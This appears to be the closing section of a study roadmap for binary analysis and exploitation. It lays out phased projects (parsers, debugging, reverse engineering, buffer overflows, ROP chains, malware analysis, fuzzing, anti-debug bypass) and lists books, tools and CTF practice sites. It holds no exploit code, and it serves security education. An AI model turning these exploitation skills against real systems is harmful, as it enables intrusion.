18 Complete Toolkit ⭐⭐⭐⭐⭐ 2-3 months Integration ⭐⭐⭐⭐

Phase 1: Foundations (4-6 weeks)

Build understanding of binary formats and tools:

  1. Project 1: ELF Parser - Understand Linux binaries
  2. Project 2: PE Parser - Understand Windows binaries
  3. Project 4: GDB Deep Dive - Master debugging
  4. Project 9: strace/ltrace - Quick dynamic analysis

Phase 2: Reverse Engineering (4-6 weeks)

Learn to understand unknown binaries:

  1. Project 5: Ghidra RE - Static analysis
  2. Project 17: radare2 Mastery - CLI analysis
  3. Project 6: Crackme Challenges - Apply skills

Phase 3: Exploitation (6-8 weeks)

Learn to exploit vulnerabilities:

  1. Project 7: Buffer Overflow - Basic exploitation
  2. Project 8: ROP Chains - Bypass protections
  3. Project 16: CTF Practice - Competition experience

Phase 4: Advanced Analysis (6-8 weeks)

Master advanced techniques:

  1. Project 10: Malware Lab - Real-world analysis
  2. Project 11: angr - Automated analysis
  3. Project 12: Fuzzing - Vulnerability discovery
  4. Project 14: Anti-Debug Bypass - Defeat protections

Phase 5: Mastery (2-4 months)

Build professional tools:

  1. Project 3: Disassembler - Deep instruction knowledge
  2. Project 13: Binary Diffing - Patch analysis
  3. Project 15: Decompiler - Code recovery
  4. Project 18: Complete Toolkit - Professional tools

Summary

# Project Main Language
1 ELF File Parser C
2 PE File Parser C
3 Build a Disassembler C
4 GDB Debugging Deep Dive GDB/Python
5 Ghidra Reverse Engineering Ghidra/Java
6 Crackme Challenges Assembly/Python
7 Buffer Overflow Exploitation C/Python
8 Return-Oriented Programming Python
9 Dynamic Analysis (strace/ltrace) Shell
10 Malware Analysis Lab Assembly/Python
11 Symbolic Execution (angr) Python
12 Fuzzing with AFL++ C/Shell
13 Binary Diffing Python
14 Anti-Debugging Bypass Assembly/Python
15 Build a Decompiler Python
16 CTF Binary Exploitation Python
17 radare2 Mastery r2/Python
18 Complete Binary Analysis Toolkit Python

Resources

Essential Books

  • “Practical Binary Analysis” by Dennis Andriesse - Best overall introduction
  • “Hacking: The Art of Exploitation” by Jon Erickson - Classic exploitation book
  • “Practical Malware Analysis” by Sikorski & Honig - Malware-focused
  • “Reversing: Secrets of Reverse Engineering” by Eldad Eilam - In-depth RE
  • “The Shellcoder’s Handbook” - Advanced exploitation

Tools

  • Ghidra: https://ghidra-sre.org/ - Free decompiler
  • radare2: https://rada.re/ - Open source RE framework
  • pwntools: https://docs.pwntools.com/ - Exploit development
  • angr: https://angr.io/ - Binary analysis framework
  • AFL++: https://aflplus.plus/ - Fuzzer

Practice Platforms

  • pwnable.kr: https://pwnable.kr/ - CTF challenges
  • crackmes.one: https://crackmes.one/ - Reverse engineering
  • ROP Emporium: https://ropemporium.com/ - ROP practice
  • Nightmare: https://guyinatuxedo.github.io/ - Walkthroughs

Reference Materials


Total Estimated Time: 8-12 months of dedicated study

After completion: You’ll be able to analyze any binary, find vulnerabilities, write exploits, analyze malware, and build professional reverse engineering tools. These skills are in high demand for security research, vulnerability assessment, malware analysis, and CTF competitions.